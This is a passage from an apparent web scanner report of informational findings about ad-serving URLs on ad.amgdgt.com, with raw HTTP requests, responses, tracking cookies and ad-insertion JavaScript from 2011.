UVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhoVmFHbHhaVWxpYmkwd1dYRnRPWE0wZG1SQ2NuVkRTRTVRV2xFbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=1762201346?">\n'+
'</SCRIPT>
...[SNIP]...
</IFRAME><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76517&c5=168277&c6=&cv=1.3&cj=1&rn=1494814222" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_343316_content);

18.14. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=4703&pl=de2c4148&rnd=25662509421817960&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUXFcREz_PYG2IyD4qwAQFyf5k8VVnZW8sdXNhLHQsMTMwNzk2NDMyNzEzNSxjLDM0MzcxMSxwYyw4MTg2MCxhYywxNzk5MzMsbyxOMC1TMCxsLDY2MTMyLHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRTWJDQVFWb3NUWU1fYXlER292QmR5LWk4X1ZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTFRWUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQTF4QUJBZ1VDQVFRQUFBQUFPQnJHUmdBQUFBQS4vY25kPSE3UVJ6S0FpNXVBVVF5S29iR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJtY3oyb3ZQMVRZbU5MSXZ0bFFmbjc3ejJDZGZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREVnQWFLbktIejN0aVA3QkEmbnVtPTEmc2lnPUFHaVdxdHpkUFRsN25IUE95eTBMMHpyVC1Ub3RRQnRFV3cmY2xpZW50PWNhLXB1Yi03NDk0MTU2MDI3MDE4MzQyJmFkdXJsPQo-/clkurl=

The response contains the following links to other domains:

http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUKG9NRNq_WCC483at.0o81DY1odtnZW8sdXNhLHQsMTMwNzk2NDMyODU1MyxjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVYRmNSRXpfUFlHMkl5RDRxd0FRRnlmNWs4VlZuWlc4c2RYTmhMSFFzTVRNd056azJORE15TnpFek5TeGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVFdKRFFWRldiM05VV1UxZllYbEVSMjkyUW1SNUxXazRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVRGNFFVSkJaMVZEUVZGUlFVRkJRVUZQUW5KSFVtZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSnRZM295YjNaUU1WUlpiVTVNU1haMGJGRm1iamMzZWpKRFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhwa1VGUnNOMjVJVUU5NWVUQk1NSHB5VkMxVWIzUlJRblJGVjNjbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=321405452?
http://ad.doubleclick.net/adj/N553.expedia.com/B5280302.8;abr=!ie;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUKG9NRNq_WCC483at.0o81DY1odtnZW8sdXNhLHQsMTMwNzk2NDMyODU1MyxjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVYRmNSRXpfUFlHMkl5RDRxd0FRRnlmNWs4VlZuWlc4c2RYTmhMSFFzTVRNd056azJORE15TnpFek5TeGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVFdKRFFWRldiM05VV1UxZllYbEVSMjkyUW1SNUxXazRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVRGNFFVSkJaMVZEUVZGUlFVRkJRVUZQUW5KSFVtZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSnRZM295YjNaUU1WUlpiVTVNU1haMGJGRm1iamMzZWpKRFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhwa1VGUnNOMjVJVUU5NWVUQk1NSHB5VkMxVWIzUlJRblJGVjNjbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=321405452?
http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76517&c5=168277&c6=&cv=1.3&cj=1&rn=841563753

Request

GET /ads/?t=i&f=j&p=4703&pl=de2c4148&rnd=25662509421817960&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUXFcREz_PYG2IyD4qwAQFyf5k8VVnZW8sdXNhLHQsMTMwNzk2NDMyNzEzNSxjLDM0MzcxMSxwYyw4MTg2MCxhYywxNzk5MzMsbyxOMC1TMCxsLDY2MTMyLHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRTWJDQVFWb3NUWU1fYXlER292QmR5LWk4X1ZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTFRWUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQTF4QUJBZ1VDQVFRQUFBQUFPQnJHUmdBQUFBQS4vY25kPSE3UVJ6S0FpNXVBVVF5S29iR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJtY3oyb3ZQMVRZbU5MSXZ0bFFmbjc3ejJDZGZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREVnQWFLbktIejN0aVA3QkEmbnVtPTEmc2lnPUFHaVdxdHpkUFRsN25IUE95eTBMMHpyVC1Ub3RRQnRFV3cmY2xpZW50PWNhLXB1Yi03NDk0MTU2MDI3MDE4MzQyJmFkdXJsPQo-/clkurl= HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982322&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964318938&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964318556&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1852423368&ga_fc=1&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=3167&xpc=Xq1icALNsj&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUtHHXxqWMCUcAG4DqiiiGcYlETVEDA3gBY2BgYGNg2neXgdVuPgOj_REGRqYQBgYGTgYGRoOO_UfuMTBNDGVgtRVhYNR6ysDw_h5CbtdL3Pq2_mJgmv6DgdVtBQOj3moGhk.f4fp2_eRkYNruzsDqmczAaA6065cZQu7ZKwamjEcMLE9_MTCqrWJguJcPk5O5obocyGbCqXe3Fi9OO3er6gL1Mvh.DWZg4GZgkK9klGFkYGDZwCgKpBgMGBmYGRjSp4IFFU8wcgMFFx5gZABSy5eClazzAFNSSxj5gYKLzoHlltUzCgJ54GC6DzKegQEA5OJHDw--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUOS66Ofqpw1kB9Sv4EYgUwhO_gWgDA3gBY2BgYGdgmhjKwGorwsCo9ZSB4f09BgYGTgYGRoOO_acyGZj23WVgtZvPwGh_hIGRKQQhd.Qebn27XuLWt_UXA9P0HwysbisYGPVWMzB8.gw3c9dPTgam7e4MrJ7JDIzmQLt.mSHknr1iYMp4xMDy9BcDo9oqBoZ7.TA5mRuqy4FsJpx6d2vx4rRzt6ouUC.D79dgBgZuBgb5SkYZRgYGlg2MokCKwYCRgZmBIX0qWFDxBCM3UHDhAUYGILV8KVjJOg8wJbWEkR8ouOgcWG5ZPaMgkAcNQpD5DAD1V01v; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:25:28 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4028
Date: Mon, 13 Jun 2011 11:25:28 GMT

_343316_amg_acamp_id=168277;
_343316_amg_pcamp_id=76517;
_343316_amg_location_id=61406;
_343316_amg_creative_id=343316;
_343316_amg_loaded=true;
var _amg_343316_content='<IFRAME SRC="http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUKG9NRNq_WCC483at.0o81DY1odtnZW8sdXNhLHQsMTMwNzk2NDMyODU1MyxjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVYRmNSRXpfUFlHMkl5RDRxd0FRRnlmNWs4VlZuWlc4c2RYTmhMSFFzTVRNd056azJORE15TnpFek5TeGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVFdKRFFWRldiM05VV1UxZllYbEVSMjkyUW1SNUxXazRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVRGNFFVSkJaMVZEUVZGUlFVRkJRVUZQUW5KSFVtZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSnRZM295YjNaUU1WUlpiVTVNU1haMGJGRm1iamMzZWpKRFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhwa1VGUnNOMjVJVUU5NWVUQk1NSHB5VkMxVWIzUlJRblJGVjNjbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=321405452?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n'+
'<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N553.expedia.com/B5280302.8;abr=!ie;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUKG9NRNq_WCC483at.0o81DY1odtnZW8sdXNhLHQsMTMwNzk2NDMyODU1MyxjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVYRmNSRXpfUFlHMkl5RDRxd0FRRnlmNWs4VlZuWlc4c2RYTmhMSFFzTVRNd056azJORE15TnpFek5TeGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVFdKRFFWRldiM05VV1UxZllYbEVSMjkyUW1SNUxXazRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVRGNFFVSkJaMVZEUVZGUlFVRkJRVUZQUW5KSFVtZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSnRZM295YjNaUU1WUlpiVTVNU1haMGJGRm1iamMzZWpKRFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhwa1VGUnNOMjVJVUU5NWVUQk1NSHB5VkMxVWIzUlJRblJGVjNjbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=321405452?">\n'+
'</SCRIPT>
...[SNIP]...
</IFRAME><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76517&c5=168277&c6=&cv=1.3&cj=1&rn=841563753" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_343316_content);

18.15. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=5112&pl=c328c765&rnd=57400481286458670&clkurl=http://ib.adnxs.com/click/XI_C9Shc_z9cj8L1KFz_PwAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQKDnkZhNUPdg_ayDGovBdy8F_PVNAAAAAIwuAAC1AAAAlgIAAAIAAABtPwYA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAIg8BAgUCAQQAAAAAcyLkcAAAAAA./cnd=!0gWuMQjn-gQQ7f4YGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB0qOfBfz1TbSzBartlQfQo_jpCdfq-NMBl6GU7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnR3YWNrbGUuY29tL2hlYWRsaW5lc5gCqA_AAgTIAoXSzwqoAwHoA4gC6AO1CPUDAAAAwIAG0bGZmoqTjeRB%26num%3D1%26sig%3DAGiWqtyj9eRGRlk2VYHLKcwsc_ANC0JuMA%26client%3Dca-pub-7494156027018342%26adurl%3D

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=80456&c5=176032&c6=&cv=1.3&cj=1&rn=2044145600

Request

GET /ads/?t=i&f=j&p=5112&pl=c328c765&rnd=57400481286458670&clkurl=http://ib.adnxs.com/click/XI_C9Shc_z9cj8L1KFz_PwAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQKDnkZhNUPdg_ayDGovBdy8F_PVNAAAAAIwuAAC1AAAAlgIAAAIAAABtPwYA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAIg8BAgUCAQQAAAAAcyLkcAAAAAA./cnd=!0gWuMQjn-gQQ7f4YGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB0qOfBfz1TbSzBartlQfQo_jpCdfq-NMBl6GU7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnR3YWNrbGUuY29tL2hlYWRsaW5lc5gCqA_AAgTIAoXSzwqoAwHoA4gC6AO1CPUDAAAAwIAG0bGZmoqTjeRB%26num%3D1%26sig%3DAGiWqtyj9eRGRlk2VYHLKcwsc_ANC0JuMA%26client%3Dca-pub-7494156027018342%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984468&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966468285&bpp=5&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966468319&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1532849483&ga_fc=1&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=80&xpc=GEVMBFEjsI&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUwLzc19M0qiczmleYOYA4OWw6DfADA3gBY2Bg4GZgmpXMwOpZy8Co38XA8Hk_AwMDJwMDo0HH7Xe6DExbzgHluhkYrdczMPz7gpB7qcjANP03A6vbUgZGvS0MDJ_.wOUutU1hYNruB9QXwsBotQeoD2ge1MxLdVcZmCaGMrDaijAwaj1lYHh_Dy63_1QmA9O.uwysdvMZGO2PMDAyhSDkjtzDrW_XS9z6tv4CuvMH0J0rgO5cDXTnZ7iZu35yAt3pDnRnMgOjOdCuX2YIuWevGJgyHjGwPP3FwKi2ioHhXj5MTuaG6nIgmwmn3t1avDjt3K2qC9TL4Ps1GBTyDPKVjDKMDAwsGxhFgRSDASMDKwND.lSwoOIJRm6g4MIDjAxAavlSsJJ1HmBKagkjP1Bw0Tmw3LJ6RkEgDxplIPMZAFbgatk-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUzfNFx6EKoH0gDtVC2UpsGwKSFdQDA3gBdZHNK4RRFMZ_5zav0pAUG01pFiwUZkURdj4WbIy_YBRW1hbIRmKlSNn4yBhRZhYjZWQsZiELC6WUTFKjxoIyFOMjx9t4Z_Wuzr3P7z7neeoCZZjoOtZwDGnrhe8doBQkMHc348OshrD6JpHmecglHXbz1IiJXyhbQNqj8PNaZFk_ZuUTqzuMNMXh5cthl7NLmMMB9QU171h9mlXIu5y6wiwOYXVUIQ0ZeE47LHk.hjm5xepcQ7pSiAkWWSrt7jvKuvsO8trzXXvuaM897Zlzdh59lGrPHu0ZQlo1K99SZA.PmNF7PJk8Ur8L6fF_5ruui.jZuHoTDeWumYm6RvXS_zYIXqidEJ.AJybVOggIJTCybIv.M_GquHEq6IiE7Sf7vfao2ZIKFTcvbLY9LZV6K3zn335.ATPocTM-; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 12:01:12 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1700
